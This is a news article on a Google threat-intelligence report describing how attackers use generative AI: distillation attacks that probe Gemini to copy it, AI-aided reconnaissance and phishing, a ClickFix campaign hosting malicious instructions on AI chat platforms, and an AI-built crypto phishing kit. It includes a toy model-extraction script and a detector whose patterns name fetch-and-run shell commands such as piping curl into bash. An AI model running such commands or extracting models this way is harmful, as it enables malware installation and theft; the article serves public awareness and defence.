Google warns AI is making hackers faster, smoother, and harder to spot; here’s how users are affected




Artificial intelligence is not creating new kinds of cyberattacks. What it is doing, according to a new report from Google’s Threat Intelligence Group (GTIG), is making existing scams faster to produce, easier to personalise and harder for users to spot.

The report tracks how hackers and threat groups are using generative AI tools in real cyber operations. Its main finding is simple: attackers are beginning to treat AI as just another tool in their workflow. Google says adversaries are now “increasingly leveraging generative AI across multiple stages of the attack lifecycle,” from researching targets to drafting phishing messages and troubleshooting malicious code.

Here are the key takeaways from the report that you, as a user, should know about how hackers are using AI to run scams:

Model extraction attacks: what do they mean for regular users?

As per the report, model extraction attacks (MEA) occur when an adversary uses legitimate access to systematically probe a mature machine learning model to extract information used to train a new model. Adversaries engaging in MEA use a technique called knowledge distillation (KD) to take information gleaned from one model and transfer the knowledge to another. For this reason, MEA are frequently referred to as "distillation attacks."

In simple terms, bad actors prompt the original, or “teacher”, model to reveal its outputs and reasoning, and use those responses to “teach” a “student” model the hackers have built. As per the report, over 100,000 prompts were identified, with the breadth of questions suggesting an attempt to replicate Gemini's reasoning ability in non-English target languages across a wide variety of tasks.
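For readers who want a concrete picture of what this looks like, here is a minimal, hypothetical sketch in Python using scikit-learn. It is a toy stand-in rather than the attackers' actual tooling: real extraction attempts probe an LLM's API with prompts, not a small local classifier, but the pattern of harvesting a model's answers to train a copy is the same.

```python
# Toy illustration of a model-extraction / distillation attack pattern.
# (Illustrative only; real attacks target LLM APIs, not local models.)
import numpy as np
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier

# "Teacher": the victim's proprietary model, which the attacker can only query.
X, y = make_classification(n_samples=2000, n_features=10, random_state=0)
teacher = RandomForestClassifier(n_estimators=100, random_state=0).fit(X, y)

# Attacker step 1: generate a large number of probe inputs (the "prompts").
probes = np.random.RandomState(1).normal(size=(5000, 10))

# Attacker step 2: harvest the teacher's answers through its public interface.
stolen_labels = teacher.predict(probes)

# Attacker step 3: train a "student" model on the harvested input/output pairs.
student = DecisionTreeClassifier(random_state=0).fit(probes, stolen_labels)

# The student now approximates the teacher's behaviour without ever seeing
# the original training data.
agreement = (student.predict(X) == teacher.predict(X)).mean()
print(f"Student agrees with teacher on {agreement:.0%} of inputs")
```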

Google says its systems recognised this activity in real time and mitigated the risk, protecting the model's internal reasoning traces.

How are you as a user affected? 

Model extraction and distillation attacks do not typically represent a risk to average users, as they do not threaten the confidentiality, availability, or integrity of AI services. Instead, the risk is concentrated among model developers and service providers. Organisations that provide AI models as a service should monitor API access for extraction or distillation patterns. 
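As a rough illustration of that kind of monitoring, the sketch below flags accounts whose query volume and prompt diversity look like systematic probing. The log format, thresholds, and function name are assumptions for the example, not anything described in the report.

```python
# Hypothetical sketch of API monitoring for extraction/distillation patterns:
# flag accounts with very high query volume and unusually broad prompts.
from collections import defaultdict

def flag_extraction_candidates(api_logs, volume_threshold=10_000, breadth_threshold=0.8):
    """api_logs is assumed to be an iterable of (account_id, prompt_text) pairs."""
    prompts_by_account = defaultdict(list)
    for account_id, prompt in api_logs:
        prompts_by_account[account_id].append(prompt)

    flagged = []
    for account_id, prompts in prompts_by_account.items():
        volume = len(prompts)
        # Crude "breadth" proxy: the share of prompts that are unique.
        breadth = len(set(prompts)) / volume if volume else 0.0
        if volume >= volume_threshold and breadth >= breadth_threshold:
            flagged.append((account_id, volume, round(breadth, 2)))
    return flagged
```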

AI as a “strategic force multiplier”

This is where the real threat starts. Previously, hackers had to profile high-profile targets manually. Now, these actors use AI like Gemini to “serve as a strategic force multiplier during the reconnaissance phase of an attack”, allowing them to rapidly synthesise open-source intelligence (OSINT) to profile high-value targets, identify key decision-makers within defence sectors, and map organisational hierarchies.

By integrating these tools into their workflow, threat actors can move from initial reconnaissance to active targeting at a faster pace and broader scale.  

How are you as a user affected? 

Because hackers have detailed information about their targets, phishing emails and scams are more personalised and far harder to recognise. Acting as a “digital sniper”, AI also enables faster attack cycles.

Using UNC6418, an unattributed threat actor, and Temp.HEX, a China-based threat actor, as examples, the report explains how they misused Gemini to conduct targeted intelligence gathering, specifically seeking out sensitive account credentials and email addresses. UNC6418 targeted accounts in a phishing campaign focused on Ukraine and the defence sector, while Temp.HEX misused Gemini and other AI tools to compile detailed information on specific individuals, including targets in Pakistan, and to collect operational and structural data on separatist organisations in various countries.

AI is being used for rapport-building phishing

Users have learned to rely on indicators such as poor grammar, awkward syntax, or a lack of cultural context to identify phishing attempts. Now, threat actors leverage LLMs to generate hyper-personalised, culturally nuanced lures that can mirror the professional tone of a target organisation or local language.

This is called "rapport-building phishing," where models are used to maintain multi-turn, believable conversations with victims to build trust before a malicious payload is ever delivered. “By lowering the barrier to entry for non-native speakers and automating the creation of high-quality content, adversaries can largely erase those 'tells' and improve the effectiveness of their social engineering efforts,” the report states.

How are you as a user affected? 

AI-driven rapport-building phishing makes scam messages sound natural, personalised, and culturally accurate, removing the usual red flags like bad grammar or awkward tone. Attackers can hold realistic, multi-step conversations to gain trust before sending malicious links or files.

The ‘ClickFix’ campaign

The report recorded that there were instances in which hackers abused the public's trust in generative AI services to attempt to deliver malware. This activity, first observed in early December 2025, attempts to trick users into installing malware via the well-established "ClickFix" technique. 

To explain it simply, threat actors socially engineer users into copying and pasting a malicious command into a command terminal, under the guise of “troubleshooting” a problem on their computer.
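As an illustration only, the command patterns these lures rely on tend to be recognisable. The sketch below is hypothetical and not taken from the report; it simply flags a few classic red flags. If a website asks you to paste anything resembling these into a terminal, stop.

```python
# Illustrative red-flag check for "ClickFix"-style copy-paste commands.
import re

RED_FLAGS = [
    r"curl .*\|\s*(bash|sh)",      # download a script and pipe it straight into a shell
    r"powershell .*-enc",          # encoded PowerShell payloads
    r"base64 (-d|--decode).*\|",   # decode hidden content and pipe it onward
    r"mshta http",                 # fetch and run a remote HTML application
]

def looks_like_clickfix(command: str) -> bool:
    """Return True if a pasted command matches a known suspicious pattern."""
    return any(re.search(pattern, command, re.IGNORECASE) for pattern in RED_FLAGS)

print(looks_like_clickfix("curl -s https://example.com/fix.sh | bash"))  # True
```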

How are you as a user affected? 

The report cites ATOMIC as an example: an information stealer that targets the macOS environment and can collect browser data, cryptocurrency wallets, system information, and files in the Desktop and Documents folders. The threat actors behind this campaign have used a wide range of AI chat platforms to host their malicious instructions, including ChatGPT, Copilot, DeepSeek, Gemini, and Grok.

How vibecoding has made fake websites easier to build

In November 2025, GTIG identified COINBAIT, a phishing kit whose construction was likely accelerated by AI code-generation tools and which masquerades as a major cryptocurrency exchange for credential harvesting. Instead of creating a fake website from scratch, hackers now only need to give the AI prompts such as "Build me a modern, professional-looking login page for a major crypto exchange." What makes the resulting website believable is that it is a React single-page application (SPA): it has smooth animations, working buttons, and complex routing, making it look identical to a real financial site.

How are you as a user affected? 

UNC5356, a financially motivated threat cluster, uses SMS- and phone-based phishing campaigns to target clients of financial organisations, cryptocurrency-related companies, and various other popular businesses and services. They send a clickable link that routes the user to the dummy website; when the victim enters their credentials, the hackers capture every keystroke in real time.
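One simple habit blunts this kind of attack: check where a link actually points before typing credentials. The sketch below is purely illustrative; the domain list and helper names are assumptions for the example, not details from the report. It shows the idea of comparing a link's registered domain against the sites you actually use.

```python
# Hypothetical check a user (or a mail/SMS filter) could apply before trusting a link:
# does the link resolve to a domain you actually recognise?
from urllib.parse import urlparse

# Illustrative allow-list; in practice this would hold the real domains of the
# exchanges and banks you use.
KNOWN_DOMAINS = {"coinbase.com", "binance.com"}

def registered_domain(url: str) -> str:
    """Naive extraction of the last two labels of the hostname (good enough for a sketch)."""
    host = urlparse(url).hostname or ""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host

def is_lookalike(url: str) -> bool:
    """A lookalike may mention the brand in the URL but resolves to an unknown domain."""
    return registered_domain(url) not in KNOWN_DOMAINS

print(is_lookalike("https://secure-coinbase-login.example.net/session"))  # True
```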
